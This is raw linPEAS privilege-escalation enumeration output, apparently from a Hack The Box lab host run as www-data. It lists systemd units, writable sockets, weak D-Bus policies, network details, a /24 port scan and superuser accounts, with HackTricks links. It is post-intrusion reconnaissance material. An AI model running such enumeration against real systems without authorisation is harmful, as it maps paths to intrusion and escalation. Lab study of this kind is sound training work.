|
|
╔══════════╣ Analyzing .service files
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
|
|
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
|
|
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
|
|
You can't write on systemd PATH
|
|
|
|
╔══════════╣ System timers
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
|
|
NEXT LEFT LAST PASSED UNIT ACTIVATES
|
|
Sun 2023-02-12 11:39:00 UTC 26min left Sun 2023-02-12 11:09:02 UTC 3min 27s ago phpsessionclean.timer phpsessionclean.service
|
|
Sun 2023-02-12 11:53:35 UTC 41min left Sun 2023-02-12 08:57:52 UTC 2h 14min ago motd-news.timer motd-news.service
|
|
Sun 2023-02-12 15:22:31 UTC 4h 10min left Sun 2023-02-12 09:17:20 UTC 1h 55min ago ua-timer.timer ua-timer.service
|
|
Sun 2023-02-12 18:24:06 UTC 7h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily.timer apt-daily.service
|
|
Mon 2023-02-13 00:00:00 UTC 12h left Mon 2023-02-06 09:52:53 UTC 6 days ago fstrim.timer fstrim.service
|
|
Mon 2023-02-13 06:56:31 UTC 19h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily-upgrade.timer apt-daily-upgrade.service
|
|
Mon 2023-02-13 09:12:42 UTC 22h left Sun 2023-02-12 09:12:42 UTC 1h 59min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
|
|
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
|
|
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
|
|
|
|
╔══════════╣ Analyzing .timer files
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
|
|
|
|
╔══════════╣ Analyzing .socket files
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
|
|
/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
|
|
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
|
|
/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
|
|
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
|
|
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
|
|
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
|
|
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
|
|
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
|
|
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
|
|
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
|
|
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
|
|
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
|
|
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
|
|
|
|
╔══════════╣ Unix Sockets Listening
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
|
|
/run/acpid.socket
|
|
└─(Read Write - Can Connect)
|
|
/run/dbus/system_bus_socket
|
|
└─(Read Write - Can Connect)
|
|
/run/lvm/lvmetad.socket
|
|
└─( - Cannot Connect)
|
|
/run/lvm/lvmpolld.socket
|
|
└─( - Cannot Connect)
|
|
/run/php/php7.4-fpm.sock
|
|
└─(Read Write - Can Connect)
|
|
/run/snapd-snap.socket
|
|
└─(Read Write - Can Connect)
|
|
/run/snapd.socket
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/journal/dev-log
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/journal/socket
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/journal/stdout
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/journal/syslog
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/notify
|
|
└─(Read Write - Can Connect)
|
|
/run/systemd/private
|
|
└─(Read Write - Can Connect)
|
|
/run/udev/control
|
|
└─( - Cannot Connect)
|
|
/run/uuidd/request
|
|
└─(Read Write - Can Connect)
|
|
/run/vmware/guestServicePipe
|
|
└─(Read Write - Can Connect)
|
|
/var/lib/lxd/unix.socket
|
|
└─( - Cannot Connect)
|
|
/var/run/dbus/system_bus_socket
|
|
└─(Read Write - Can Connect)
|
|
/var/run/vmware/guestServicePipe
|
|
└─(Read Write - Can Connect)
|
|
/var/www/.gnupg/S.gpg-agent
|
|
└─(Read Write - Can Connect)
|
|
/var/www/.gnupg/S.gpg-agent.browser
|
|
└─(Read Write - Can Connect)
|
|
/var/www/.gnupg/S.gpg-agent.extra
|
|
└─(Read Write - Can Connect)
|
|
/var/www/.gnupg/S.gpg-agent.ssh
|
|
└─(Read Write - Can Connect)
|
|
|
|
╔══════════╣ D-Bus config files
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
|
|
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
|
|
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
|
|
|
|
╔══════════╣ D-Bus Service Objects list
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
|
|
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
|
|
:1.0 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
|
|
:1.1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
|
|
:1.2 1 systemd root :1.2 init.scope - -
|
|
:1.3 1289 accounts-daemon[0m root :1.3 accounts-daemon.service - -
|
|
:1.433 51087 snapd root :1.433 snapd.service - -
|
|
:1.434 51158 systemd-timedat root :1.434 systemd-timedated.service - -
|
|
:1.436 51415 busctl www-data :1.436 php7.4-fpm.service - -
|
|
:1.5 1402 systemd-logind root :1.5 systemd-logind.service - -
|
|
:1.6 1478 polkitd root :1.6 polkit.service - -
|
|
:1.7 1399 networkd-dispat root :1.7 networkd-dispatcher.se…ce - -
|
|
com.ubuntu.LanguageSelector - - - (activatable) - -
|
|
com.ubuntu.SoftwareProperties - - - (activatable) - -
|
|
org.freedesktop.Accounts 1289 accounts-daemon[0m root :1.3 accounts-daemon.service - -
|
|
org.freedesktop.DBus 1 systemd root - init.scope - -
|
|
org.freedesktop.PolicyKit1 1478 polkitd root :1.6 polkit.service - -
|
|
org.freedesktop.hostname1 - - - (activatable) - -
|
|
org.freedesktop.locale1 - - - (activatable) - -
|
|
org.freedesktop.login1 1402 systemd-logind root :1.5 systemd-logind.service - -
|
|
org.freedesktop.network1 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
|
|
org.freedesktop.resolve1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
|
|
org.freedesktop.systemd1 1 systemd root :1.2 init.scope - -
|
|
org.freedesktop.thermald - - - (activatable) - -
|
|
org.freedesktop.timedate1 51158 systemd-timedat root :1.434 systemd-timedated.service - -
|
|
|
|
|
|
╔═════════════════════╗
|
|
══════════════════════════════╣ Network Information ╠══════════════════════════════
|
|
╚═════════════════════╝
|
|
╔══════════╣ Hostname, hosts and DNS
|
|
interface
|
|
127.0.0.1 localhost interface interface.htb
|
|
127.0.1.1 interface
|
|
|
|
::1 ip6-localhost ip6-loopback
|
|
fe00::0 ip6-localnet
|
|
ff00::0 ip6-mcastprefix
|
|
ff02::1 ip6-allnodes
|
|
ff02::2 ip6-allrouters
|
|
|
|
nameserver 127.0.0.53
|
|
options edns0
|
|
|
|
╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf
|
|
/etc/inetd.conf Not Found
|
|
|
|
╔══════════╣ Interfaces
|
|
# symbolic names for networks, see networks(5) for more information
|
|
link-local 169.254.0.0
|
|
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
|
|
inet 10.129.18.131 netmask 255.255.0.0 broadcast 10.129.255.255
|
|
inet6 fe80::250:56ff:feb9:6684 prefixlen 64 scopeid 0x20<link>
|
|
inet6 dead:beef::250:56ff:feb9:6684 prefixlen 64 scopeid 0x0<global>
|
|
ether 00:50:56:b9:66:84 txqueuelen 1000 (Ethernet)
|
|
RX packets 30700 bytes 32636656 (32.6 MB)
|
|
RX errors 0 dropped 0 overruns 0 frame 0
|
|
TX packets 20991 bytes 2787551 (2.7 MB)
|
|
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
|
|
|
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
|
|
inet 127.0.0.1 netmask 255.0.0.0
|
|
inet6 ::1 prefixlen 128 scopeid 0x10<host>
|
|
loop txqueuelen 1000 (Local Loopback)
|
|
RX packets 12767 bytes 1125794 (1.1 MB)
|
|
RX errors 0 dropped 0 overruns 0 frame 0
|
|
TX packets 12767 bytes 1125794 (1.1 MB)
|
|
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
|
|
|
|
|
╔══════════╣ Networks and neighbours
|
|
Kernel IP routing table
|
|
Destination Gateway Genmask Flags Metric Ref Use Iface
|
|
default 10.129.0.1 0.0.0.0 UG 0 0 0 eth0
|
|
10.129.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
|
|
Address HWtype HWaddress Flags Mask Iface
|
|
10.129.18.159 ether 00:50:56:b9:01:03 C eth0
|
|
10.129.18.165 ether 00:50:56:b9:99:7c C eth0
|
|
10.129.18.154 ether 00:50:56:b9:8b:d0 C eth0
|
|
10.129.18.56 ether 00:50:56:b9:53:0d C eth0
|
|
10.129.18.143 ether 00:50:56:b9:30:a2 C eth0
|
|
10.129.18.81 ether 00:50:56:b9:db:ca C eth0
|
|
10.129.18.160 ether 00:50:56:b9:49:90 C eth0
|
|
10.129.18.149 ether 00:50:56:b9:32:0a C eth0
|
|
10.129.18.59 ether 00:50:56:b9:3a:e3 C eth0
|
|
10.129.18.40 ether 00:50:56:b9:1a:97 C eth0
|
|
10.129.18.29 ether 00:50:56:b9:47:ee C eth0
|
|
10.129.18.108 ether 00:50:56:b9:a4:90 C eth0
|
|
10.129.18.163 ether 00:50:56:b9:1c:37 C eth0
|
|
10.129.18.65 ether 00:50:56:b9:99:bd C eth0
|
|
10.129.18.144 ether 00:50:56:b9:61:b4 C eth0
|
|
10.129.18.43 ether 00:50:56:b9:aa:21 C eth0
|
|
10.129.18.122 ether 00:50:56:b9:b6:de C eth0
|
|
10.129.18.111 ether 00:50:56:b9:24:2f C eth0
|
|
10.129.18.147 ether 00:50:56:b9:0b:70 C eth0
|
|
10.129.18.128 ether 00:50:56:b9:76:a2 C eth0
|
|
10.129.18.38 ether 00:50:56:b9:72:f1 C eth0
|
|
10.129.18.117 ether 00:50:56:b9:87:2e C eth0
|
|
10.129.18.8 ether 00:50:56:b9:ea:f8 C eth0
|
|
10.129.18.33 ether 00:50:56:b9:a7:48 C eth0
|
|
10.129.18.90 ether 00:50:56:b9:f1:a4 C eth0
|
|
10.129.18.169 ether 00:50:56:b9:77:6b C eth0
|
|
10.129.18.79 ether 00:50:56:b9:58:ab C eth0
|
|
10.129.18.158 ether 00:50:56:b9:d3:5b C eth0
|
|
10.129.18.60 ether 00:50:56:b9:c1:df C eth0
|
|
10.129.18.115 ether 00:50:56:b9:d8:da C eth0
|
|
10.129.18.17 ether 00:50:56:b9:c4:43 C eth0
|
|
10.129.18.96 ether 00:50:56:b9:ef:f3 C eth0
|
|
10.129.18.6 ether 00:50:56:b9:5c:70 C eth0
|
|
10.129.18.164 ether 00:50:56:b9:5e:20 C eth0
|
|
10.129.18.153 ether 00:50:56:b9:2c:b1 C eth0
|
|
10.129.18.63 ether 00:50:56:b9:87:95 C eth0
|
|
10.129.18.44 ether 00:50:56:b9:31:fa C eth0
|
|
10.129.18.167 ether 00:50:56:b9:dc:75 C eth0
|
|
10.129.18.148 ether 00:50:56:b9:83:95 C eth0
|
|
10.129.18.137 ether 00:50:56:b9:6f:fe C eth0
|
|
10.129.18.47 ether 00:50:56:b9:ea:31 C eth0
|
|
10.129.18.126 ether 00:50:56:b9:2a:f7 C eth0
|
|
10.129.18.28 ether 00:50:56:b9:7e:19 C eth0
|
|
10.129.18.162 ether 00:50:56:b9:59:8f C eth0
|
|
10.129.18.151 ether 00:50:56:b9:12:fc C eth0
|
|
10.129.0.1 ether 00:50:56:b9:44:e3 C eth0
|
|
10.129.18.53 ether 00:50:56:b9:3d:24 C eth0
|
|
10.129.18.132 ether 00:50:56:b9:4d:8f C eth0
|
|
10.129.18.42 ether 00:50:56:b9:26:ae C eth0
|
|
10.129.18.121 ether 00:50:56:b9:e1:e7 C eth0
|
|
10.129.18.110 ether 00:50:56:b9:a7:88 C eth0
|
|
10.129.18.135 ether 00:50:56:b9:b4:d0 C eth0
|
|
10.129.18.37 ether 00:50:56:b9:76:b5 C eth0
|
|
10.129.18.105 ether 00:50:56:b9:3c:77 C eth0
|
|
10.129.18.94 ether 00:50:56:b9:c0:e4 C eth0
|
|
10.129.18.32 ether 00:50:56:b9:dd:51 C eth0
|
|
10.129.18.21 ether 00:50:56:b9:3e:66 C eth0
|
|
10.129.18.89 ether 00:50:56:b9:0b:04 C eth0
|
|
10.129.18.168 ether 00:50:56:b9:f5:0d C eth0
|
|
10.129.18.157 ether 00:50:56:b9:84:18 C eth0
|
|
10.129.18.35 ether 00:50:56:b9:42:66 C eth0
|
|
10.129.18.152 ether 00:50:56:b9:6d:f3 C eth0
|
|
10.129.18.141 ether 00:50:56:b9:df:b0 C eth0
|
|
10.129.18.0 ether 00:50:56:b9:30:80 C eth0
|
|
10.129.18.166 ether 00:50:56:b9:68:d9 C eth0
|
|
10.129.18.155 ether 00:50:56:b9:61:71 C eth0
|
|
10.129.18.125 ether 00:50:56:b9:82:3d C eth0
|
|
10.129.18.3 ether 00:50:56:b9:57:7c C eth0
|
|
10.129.18.161 ether 00:50:56:b9:77:e8 C eth0
|
|
10.129.18.150 ether 00:50:56:b9:11:06 C eth0
|
|
10.129.18.41 ether 00:50:56:b9:25:fb C eth0
|
|
10.129.18.145 ether 00:50:56:b9:94:be C eth0
|
|
10.129.18.55 ether 00:50:56:b9:67:fe C eth0
|
|
10.129.18.134 ether 00:50:56:b9:09:86 C eth0
|
|
10.129.18.123 ether 00:50:56:b9:af:4c C eth0
|
|
10.129.18.118 ether 00:50:56:b9:2a:5e C eth0
|
|
10.129.18.20 ether 00:50:56:b9:cc:05 C eth0
|
|
10.129.18.107 ether 00:50:56:b9:1a:99 C eth0
|
|
10.129.18.156 ether 00:50:56:b9:c9:fb C eth0
|
|
10.129.18.34 ether 00:50:56:b9:bf:05 C eth0
|
|
10.129.18.113 ether 00:50:56:b9:56:f5 C eth0
|
|
10.129.18.102 ether 00:50:56:b9:f4:f2 C eth0
|
|
10.129.18.91 ether 00:50:56:b9:0c:9c C eth0
|
|
|
|
╔══════════╣ Iptables rules
|
|
iptables rules Not Found
|
|
|
|
╔══════════╣ Active Ports
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
|
|
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1627/nginx: worker
|
|
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
|
|
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
|
|
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN 1759/node
|
|
tcp6 0 0 :::80 :::* LISTEN 1627/nginx: worker
|
|
tcp6 0 0 :::22 :::* LISTEN -
|
|
|
|
╔══════════╣ Can I sniff with tcpdump?
|
|
No
|
|
|
|
╔══════════╣ Internet Access?
|
|
Ping is not available
|
|
Port 80 is not accessible
|
|
Port 443 is not accessible
|
|
DNS not available
|
|
|
|
╔══════════╣ Scanning local networks (using /24)
|
|
══╣ Discovering hosts in 10.129.18.131/24
|
|
Scanning top ports of 10.129.18.0
|
|
|
|
[+] Open port at: 10.129.18.0:22
|
|
[+] Open port at: 10.129.18.0:80
|
|
|
|
Scanning top ports of 10.129.18.102
|
|
|
|
[+] Open port at: 10.129.18.102:22
|
|
[+] Open port at: 10.129.18.102:80
|
|
|
|
Scanning top ports of 10.129.18.105
|
|
|
|
[+] Open port at: 10.129.18.105:22
|
|
[+] Open port at: 10.129.18.105:80
|
|
|
|
Scanning top ports of 10.129.18.107
|
|
|
|
[+] Open port at: 10.129.18.107:22
|
|
[+] Open port at: 10.129.18.107:80
|
|
|
|
Scanning top ports of 10.129.18.108
|
|
|
|
[+] Open port at: 10.129.18.108:22
|
|
[+] Open port at: 10.129.18.108:80
|
|
|
|
Scanning top ports of 10.129.18.110
|
|
|
|
[+] Open port at: 10.129.18.110:22
|
|
[+] Open port at: 10.129.18.110:80
|
|
|
|
Scanning top ports of 10.129.18.111
|
|
|
|
[+] Open port at: 10.129.18.111:22
|
|
[+] Open port at: 10.129.18.111:80
|
|
|
|
Scanning top ports of 10.129.18.113
|
|
|
|
[+] Open port at: 10.129.18.113:22
|
|
[+] Open port at: 10.129.18.113:80
|
|
|
|
Scanning top ports of 10.129.18.115
|
|
|
|
[+] Open port at: 10.129.18.115:22
|
|
[+] Open port at: 10.129.18.115:80
|
|
|
|
Scanning top ports of 10.129.18.117
|
|
|
|
[+] Open port at: 10.129.18.117:22
|
|
[+] Open port at: 10.129.18.117:80
|
|
|
|
Scanning top ports of 10.129.18.118
|
|
|
|
[+] Open port at: 10.129.18.118:22
|
|
[+] Open port at: 10.129.18.118:80
|
|
|
|
Scanning top ports of 10.129.18.121
|
|
|
|
[+] Open port at: 10.129.18.121:22
|
|
[+] Open port at: 10.129.18.121:80
|
|
|
|
Scanning top ports of 10.129.18.123
|
|
|
|
[+] Open port at: 10.129.18.123:22
|
|
[+] Open port at: 10.129.18.123:80
|
|
|
|
Scanning top ports of 10.129.18.125
|
|
|
|
[+] Open port at: 10.129.18.125:22
|
|
[+] Open port at: 10.129.18.125:80
|
|
|
|
Scanning top ports of 10.129.18.126
|
|
|
|
[+] Open port at: 10.129.18.126:22
|
|
[+] Open port at: 10.129.18.126:80
|
|
|
|
Scanning top ports of 10.129.18.128
|
|
|
|
[+] Open port at: 10.129.18.128:22
|
|
[+] Open port at: 10.129.18.128:80
|
|
|
|
Scanning top ports of 10.129.18.131 (local)
|
|
|
|
[+] Open port at: 10.129.18.131:22
|
|
[+] Open port at: 10.129.18.131:80
|
|
|
|
Scanning top ports of 10.129.18.132
|
|
|
|
[+] Open port at: 10.129.18.132:22
|
|
[+] Open port at: 10.129.18.132:80
|
|
|
|
Scanning top ports of 10.129.18.134
|
|
|
|
[+] Open port at: 10.129.18.134:22
|
|
[+] Open port at: 10.129.18.134:80
|
|
|
|
Scanning top ports of 10.129.18.135
|
|
|
|
[+] Open port at: 10.129.18.135:22
|
|
[+] Open port at: 10.129.18.135:80
|
|
|
|
Scanning top ports of 10.129.18.137
|
|
|
|
[+] Open port at: 10.129.18.137:22
|
|
[+] Open port at: 10.129.18.137:80
|
|
|
|
Scanning top ports of 10.129.18.141
|
|
|
|
[+] Open port at: 10.129.18.141:22
|
|
[+] Open port at: 10.129.18.141:80
|
|
|
|
Scanning top ports of 10.129.18.144
|
|
|
|
[+] Open port at: 10.129.18.144:22
|
|
[+] Open port at: 10.129.18.144:80
|
|
|
|
Scanning top ports of 10.129.18.145
|
|
|
|
[+] Open port at: 10.129.18.145:22
|
|
[+] Open port at: 10.129.18.145:80
|
|
|
|
Scanning top ports of 10.129.18.150
|
|
|
|
[+] Open port at: 10.129.18.150:22
|
|
[+] Open port at: 10.129.18.150:80
|
|
|
|
Scanning top ports of 10.129.18.151
|
|
|
|
[+] Open port at: 10.129.18.151:22
|
|
[+] Open port at: 10.129.18.151:80
|
|
|
|
Scanning top ports of 10.129.18.152
|
|
|
|
[+] Open port at: 10.129.18.152:22
|
|
[+] Open port at: 10.129.18.152:80
|
|
|
|
Scanning top ports of 10.129.18.155
|
|
|
|
[+] Open port at: 10.129.18.155:22
|
|
[+] Open port at: 10.129.18.155:80
|
|
|
|
Scanning top ports of 10.129.18.156
|
|
|
|
[+] Open port at: 10.129.18.156:22
|
|
[+] Open port at: 10.129.18.156:80
|
|
|
|
Scanning top ports of 10.129.18.157
|
|
|
|
[+] Open port at: 10.129.18.157:22
|
|
[+] Open port at: 10.129.18.157:80
|
|
|
|
Scanning top ports of 10.129.18.158
|
|
|
|
[+] Open port at: 10.129.18.158:22
|
|
[+] Open port at: 10.129.18.158:80
|
|
|
|
Scanning top ports of 10.129.18.159
|
|
|
|
[+] Open port at: 10.129.18.159:22
|
|
[+] Open port at: 10.129.18.159:80
|
|
|
|
Scanning top ports of 10.129.18.160
|
|
|
|
[+] Open port at: 10.129.18.160:22
|
|
[+] Open port at: 10.129.18.160:80
|
|
|
|
Scanning top ports of 10.129.18.161
|
|
|
|
[+] Open port at: 10.129.18.161:22
|
|
[+] Open port at: 10.129.18.161:80
|
|
|
|
Scanning top ports of 10.129.18.162
|
|
|
|
[+] Open port at: 10.129.18.162:22
|
|
[+] Open port at: 10.129.18.162:80
|
|
|
|
Scanning top ports of 10.129.18.163
|
|
|
|
[+] Open port at: 10.129.18.163:22
|
|
[+] Open port at: 10.129.18.163:80
|
|
|
|
Scanning top ports of 10.129.18.164
|
|
|
|
[+] Open port at: 10.129.18.164:22
|
|
[+] Open port at: 10.129.18.164:80
|
|
|
|
Scanning top ports of 10.129.18.165
|
|
|
|
[+] Open port at: 10.129.18.165:22
|
|
[+] Open port at: 10.129.18.165:80
|
|
|
|
Scanning top ports of 10.129.18.166
|
|
|
|
[+] Open port at: 10.129.18.166:22
|
|
[+] Open port at: 10.129.18.166:80
|
|
|
|
Scanning top ports of 10.129.18.167
|
|
|
|
[+] Open port at: 10.129.18.167:22
|
|
[+] Open port at: 10.129.18.167:80
|
|
|
|
Scanning top ports of 10.129.18.168
|
|
|
|
[+] Open port at: 10.129.18.168:22
|
|
[+] Open port at: 10.129.18.168:80
|
|
|
|
Scanning top ports of 10.129.18.169
|
|
|
|
[+] Open port at: 10.129.18.169:22
|
|
[+] Open port at: 10.129.18.169:80
|
|
|
|
Scanning top ports of 10.129.18.17
|
|
|
|
[+] Open port at: 10.129.18.17:22
|
|
[+] Open port at: 10.129.18.17:80
|
|
|
|
Scanning top ports of 10.129.18.170
|
|
|
|
[+] Open port at: 10.129.18.170:22
|
|
[+] Open port at: 10.129.18.170:80
|
|
|
|
Scanning top ports of 10.129.18.171
|
|
|
|
[+] Open port at: 10.129.18.171:22
|
|
[+] Open port at: 10.129.18.171:80
|
|
|
|
Scanning top ports of 10.129.18.172
|
|
|
|
[+] Open port at: 10.129.18.172:22
|
|
[+] Open port at: 10.129.18.172:80
|
|
|
|
Scanning top ports of 10.129.18.173
|
|
|
|
[+] Open port at: 10.129.18.173:22
|
|
[+] Open port at: 10.129.18.173:80
|
|
|
|
Scanning top ports of 10.129.18.174
|
|
|
|
[+] Open port at: 10.129.18.174:22
|
|
[+] Open port at: 10.129.18.174:80
|
|
|
|
Scanning top ports of 10.129.18.175
|
|
|
|
[+] Open port at: 10.129.18.175:22
|
|
[+] Open port at: 10.129.18.175:80
|
|
|
|
Scanning top ports of 10.129.18.20
|
|
|
|
[+] Open port at: 10.129.18.20:22
|
|
[+] Open port at: 10.129.18.20:80
|
|
|
|
Scanning top ports of 10.129.18.21
|
|
|
|
[+] Open port at: 10.129.18.21:22
|
|
[+] Open port at: 10.129.18.21:80
|
|
|
|
Scanning top ports of 10.129.18.28
|
|
|
|
[+] Open port at: 10.129.18.28:22
|
|
[+] Open port at: 10.129.18.28:80
|
|
|
|
Scanning top ports of 10.129.18.29
|
|
|
|
[+] Open port at: 10.129.18.29:22
|
|
[+] Open port at: 10.129.18.29:80
|
|
|
|
Scanning top ports of 10.129.18.3
|
|
|
|
[+] Open port at: 10.129.18.3:22
|
|
[+] Open port at: 10.129.18.3:80
|
|
|
|
Scanning top ports of 10.129.18.32
|
|
|
|
[+] Open port at: 10.129.18.32:22
|
|
[+] Open port at: 10.129.18.32:80
|
|
|
|
Scanning top ports of 10.129.18.33
|
|
|
|
[+] Open port at: 10.129.18.33:22
|
|
[+] Open port at: 10.129.18.33:80
|
|
|
|
Scanning top ports of 10.129.18.34
|
|
|
|
[+] Open port at: 10.129.18.34:22
|
|
[+] Open port at: 10.129.18.34:80
|
|
|
|
Scanning top ports of 10.129.18.35
|
|
|
|
[+] Open port at: 10.129.18.35:22
|
|
[+] Open port at: 10.129.18.35:80
|
|
|
|
Scanning top ports of 10.129.18.37
|
|
|
|
[+] Open port at: 10.129.18.37:22
|
|
[+] Open port at: 10.129.18.37:80
|
|
|
|
Scanning top ports of 10.129.18.38
|
|
|
|
[+] Open port at: 10.129.18.38:22
|
|
[+] Open port at: 10.129.18.38:80
|
|
|
|
Scanning top ports of 10.129.18.40
|
|
|
|
[+] Open port at: 10.129.18.40:22
|
|
[+] Open port at: 10.129.18.40:80
|
|
|
|
Scanning top ports of 10.129.18.41
|
|
|
|
[+] Open port at: 10.129.18.41:22
|
|
[+] Open port at: 10.129.18.41:80
|
|
|
|
Scanning top ports of 10.129.18.42
|
|
|
|
[+] Open port at: 10.129.18.42:22
|
|
[+] Open port at: 10.129.18.42:80
|
|
|
|
Scanning top ports of 10.129.18.43
|
|
|
|
[+] Open port at: 10.129.18.43:22
|
|
[+] Open port at: 10.129.18.43:80
|
|
|
|
Scanning top ports of 10.129.18.44
|
|
|
|
[+] Open port at: 10.129.18.44:22
|
|
[+] Open port at: 10.129.18.44:80
|
|
|
|
Scanning top ports of 10.129.18.47
|
|
|
|
[+] Open port at: 10.129.18.47:22
|
|
[+] Open port at: 10.129.18.47:80
|
|
|
|
Scanning top ports of 10.129.18.53
|
|
|
|
[+] Open port at: 10.129.18.53:22
|
|
[+] Open port at: 10.129.18.53:80
|
|
|
|
Scanning top ports of 10.129.18.55
|
|
|
|
[+] Open port at: 10.129.18.55:22
|
|
[+] Open port at: 10.129.18.55:80
|
|
|
|
Scanning top ports of 10.129.18.56
|
|
|
|
[+] Open port at: 10.129.18.56:22
|
|
[+] Open port at: 10.129.18.56:80
|
|
|
|
Scanning top ports of 10.129.18.59
|
|
|
|
[+] Open port at: 10.129.18.59:22
|
|
[+] Open port at: 10.129.18.59:80
|
|
|
|
Scanning top ports of 10.129.18.6
|
|
|
|
[+] Open port at: 10.129.18.6:22
|
|
[+] Open port at: 10.129.18.6:80
|
|
|
|
Scanning top ports of 10.129.18.60
|
|
|
|
[+] Open port at: 10.129.18.60:22
|
|
[+] Open port at: 10.129.18.60:80
|
|
|
|
Scanning top ports of 10.129.18.63
|
|
|
|
[+] Open port at: 10.129.18.63:22
|
|
[+] Open port at: 10.129.18.63:80
|
|
|
|
Scanning top ports of 10.129.18.65
|
|
|
|
[+] Open port at: 10.129.18.65:22
|
|
[+] Open port at: 10.129.18.65:80
|
|
|
|
Scanning top ports of 10.129.18.79
|
|
|
|
[+] Open port at: 10.129.18.79:22
|
|
[+] Open port at: 10.129.18.79:80
|
|
|
|
Scanning top ports of 10.129.18.8
|
|
|
|
[+] Open port at: 10.129.18.8:22
|
|
[+] Open port at: 10.129.18.8:80
|
|
|
|
Scanning top ports of 10.129.18.81
|
|
|
|
[+] Open port at: 10.129.18.81:22
|
|
[+] Open port at: 10.129.18.81:80
|
|
|
|
Scanning top ports of 10.129.18.89
|
|
|
|
[+] Open port at: 10.129.18.89:22
|
|
[+] Open port at: 10.129.18.89:80
|
|
|
|
Scanning top ports of 10.129.18.90
|
|
|
|
[+] Open port at: 10.129.18.90:22
|
|
[+] Open port at: 10.129.18.90:80
|
|
|
|
Scanning top ports of 10.129.18.91
|
|
|
|
[+] Open port at: 10.129.18.91:22
|
|
[+] Open port at: 10.129.18.91:80
|
|
|
|
Scanning top ports of 10.129.18.94
|
|
|
|
[+] Open port at: 10.129.18.94:22
|
|
[+] Open port at: 10.129.18.94:80
|
|
|
|
Scanning top ports of 10.129.18.96
|
|
|
|
[+] Open port at: 10.129.18.96:22
|
|
[+] Open port at: 10.129.18.96:80
|
|
|
|
|
|
══╣ Scanning top ports of host.docker.internal
|
|
|
|
|
|
|
|
╔═══════════════════╗
|
|
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
|
|
╚═══════════════════╝
|
|
╔══════════╣ My user
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
|
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
|
|
╔══════════╣ Do I have PGP keys?
|
|
/usr/bin/gpg
|
|
netpgpkeys Not Found
|
|
netpgp Not Found
|
|
|
|
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
|
|
|
|
╔══════════╣ Checking sudo tokens
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
|
|
ptrace protection is enabled (1)
|
|
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
|
|
|
|
╔══════════╣ Checking Pkexec policy
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
|
|
|
|
[Configuration]
|
|
AdminIdentities=unix-user:0
|
|
[Configuration]
|
|
AdminIdentities=unix-group:sudo;unix-group:admin
|
|
|
|
╔══════════╣ Superusers
|
|
root:x:0:0:root:/root:/bin/bash
|
|
|
|
